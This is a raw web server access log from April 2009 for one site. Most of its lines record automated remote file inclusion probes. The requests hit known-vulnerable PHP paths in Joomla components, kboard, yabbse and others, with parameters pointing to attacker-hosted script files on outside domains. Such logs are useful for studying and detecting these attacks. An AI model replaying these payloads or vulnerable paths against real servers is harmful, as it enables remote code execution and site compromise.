59.16.91.22 - - [02/Apr/2009:10:50:42 -0700] "GET /logs/access_081002.log/errors.php?error=http://MetalBlack.altervista.org/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:10:50:42 -0700] "GET /errors.php?error=http://MetalBlack.altervista.org/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:10:50:42 -0700] "GET /logs/errors.php?error=http://MetalBlack.altervista.org/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:43 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:43 -0700] "GET /logs/access_090114.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:50:43 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.106.172 - - [02/Apr/2009:10:51:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:51:08 -0700] "GET /logs/access_081003.log%20%20//yabbse/Sources/Packages.php?sourcedir=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:51:18 -0700] "GET /logs/access_090205.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:51:18 -0700] "GET /logs/access_090205.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:51:21 -0700] "GET /logs/access_090225.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.147.175.20 - - [02/Apr/2009:10:51:26 -0700] "GET /xjplelanaaaagbipf.php HTTP/1.0" 404 275 "-" "ClamAV 0.95" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:51:34 -0700] "GET /logs/access_080727.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.119.205.130 - - [02/Apr/2009:10:51:36 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.119.205.130 - - [02/Apr/2009:10:51:36 -0700] "GET /logs/access_090124.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.79.248 - - [02/Apr/2009:10:51:36 -0700] "GET /logs/access_080727.log%20%20//bits_listings.php?svr_rootPhpStart=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.119.205.130 - - [02/Apr/2009:10:51:36 -0700] "GET /kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.119.205.130 - - [02/Apr/2009:10:51:37 -0700] "GET /logs/access_090203.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:52:18 -0700] "GET /logs/access_090114.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:52:57 -0700] "GET /logs/access_090225.log%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:52:58 -0700] "GET /logs/access_080330.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:53:13 -0700] "GET /logs/access_081003.log//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:53:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:53:44 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:53:44 -0700] "GET /logs/access_080527.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:53:55 -0700] "GET /logs/access_080712.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:53:55 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:53:55 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:53:55 -0700] "GET /logs/access_081018.log//yabbse/Sources/Packages.php?sourcedir=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:54:03 -0700] "GET /logs/access_081003.log//yabbse/Sources/Packages.php?sourcedir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:12 -0700] "GET /logs/access_080307.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:54:19 -0700] "GET /body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:54:19 -0700] "GET /logs/access_090206.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:54:19 -0700] "GET /logs//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:10:54:23 -0700] "GET /logs/access_090318.log//body_default.php?GOODS[no]=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:33 -0700] "GET /logs/access_080712.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:34 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.169 - - [02/Apr/2009:10:54:34 -0700] "GET /logs/access_071209.log HTTP/1.0" 200 44097 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:35 -0700] "GET /logs/access_080307.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:35 -0700] "GET /logs/access_080307.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:37 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:37 -0700] "GET /logs/access_080712.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [02/Apr/2009:10:54:37 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:10:54:39 -0700] "GET /logs/access_080929.log/errors.php?error=http://MetalBlack.altervista.org/idx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:08 -0700] "GET /logs/access_081227.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:08 -0700] "GET /kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:08 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:12 -0700] "GET /kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:12 -0700] "GET /logs/access_081227.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:12 -0700] "GET /logs//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:35 -0700] "GET /logs/access_090201.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:55:37 -0700] "GET /logs/access_090201.log//kboard/kboard.php?board=free&act=http://dkmedia.kr/kboard/systemid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:55:42 -0700] "GET /logs/access_090114.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.67 - - [02/Apr/2009:10:55:43 -0700] "GET /logs/access_080402.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.67 - - [02/Apr/2009:10:55:43 -0700] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.67 - - [02/Apr/2009:10:55:44 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
113.29.225.11 - - [02/Apr/2009:10:55:44 -0700] "GET /logs/access_090225.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.67 - - [02/Apr/2009:10:55:50 -0700] "GET /logs/access_090228.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:55:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:55:56 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:55:56 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:56:02 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:56:42 -0700] "GET /logs/access_080802.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [02/Apr/2009:10:56:42 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oilshalereserves.com/images/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:56:55 -0700] "GET /xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:56:55 -0700] "GET /logs/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:56:59 -0700] "GET /xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:56:59 -0700] "GET /logs/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:57:00 -0700] "GET /logs/access_080424.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:57:01 -0700] "GET /logs/access_090102.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:57:06 -0700] "GET /logs/access_080424.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:57:06 -0700] "GET /logs/access_090102.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [02/Apr/2009:10:57:07 -0700] "GET /logs/access_080905.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.spiritofsharing.org/auction1/banner/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.198 - - [02/Apr/2009:10:57:07 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.spiritofsharing.org/auction1/banner/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.198 - - [02/Apr/2009:10:57:07 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.spiritofsharing.org/auction1/banner/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:10:57:18 -0700] "GET /logs/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:10:57:22 -0700] "GET /?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:10:57:28 -0700] "GET /logs/access_090223.log/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:57:59 -0700] "GET /logs/access_080527.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:10:58:10 -0700] "GET /logs//index.php?lng=http://spk-wellness.de/smile.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:10:58:12 -0700] "GET /index.php?lng=http://spk-wellness.de/smile.gif? HTTP/1.1" 200 106008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:10:58:16 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.184.86 - - [02/Apr/2009:10:58:28 -0700] "GET /logs//index.php?lng=http://spk-wellness.de/smile.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "dmulk.com"
80.237.184.86 - - [02/Apr/2009:10:58:52 -0700] "GET /index.php?lng=http://spk-wellness.de/smile.gif? HTTP/1.1" 200 65555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "dmulk.com"
213.189.27.153 - - [02/Apr/2009:10:59:28 -0700] "GET /logs/access_090312.log%20%20//?_PHPLIB[libdir]=http://flamingo.digistorme.com//administrator/language/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.27.153 - - [02/Apr/2009:10:59:28 -0700] "GET /logs//?_PHPLIB[libdir]=http://flamingo.digistorme.com//administrator/language/idfx1.txt? HTTP/1.1" 200 93475 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:59:30 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.27.153 - - [02/Apr/2009:10:59:39 -0700] "GET /?_PHPLIB[libdir]=http://flamingo.digistorme.com//administrator/language/idfx1.txt? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
213.189.27.153 - - [02/Apr/2009:10:59:44 -0700] "GET /logs/access_090111.log%20%20//?_PHPLIB[libdir]=http://flamingo.digistorme.com//administrator/language/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:10:59:48 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:11:00:12 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [02/Apr/2009:11:00:13 -0700] "GET /logs/access_090223.log%20%20/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:16 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:16 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:17 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:17 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:24 -0700] "GET /logs/access_080502.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:28 -0700] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:30 -0700] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:30 -0700] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:32 -0700] "GET /logs/access_080502.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:32 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:32 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:33 -0700] "GET /logs/access_080502.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:38 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:38 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:39 -0700] "GET /logs/access_080502.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:00:39 -0700] "GET /logs/access_080522.log//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:12 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:12 -0700] "GET /logs/access_080502.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:12 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:13 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:18 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:23 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:23 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:23 -0700] "GET /logs/access_080502.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [02/Apr/2009:11:01:28 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
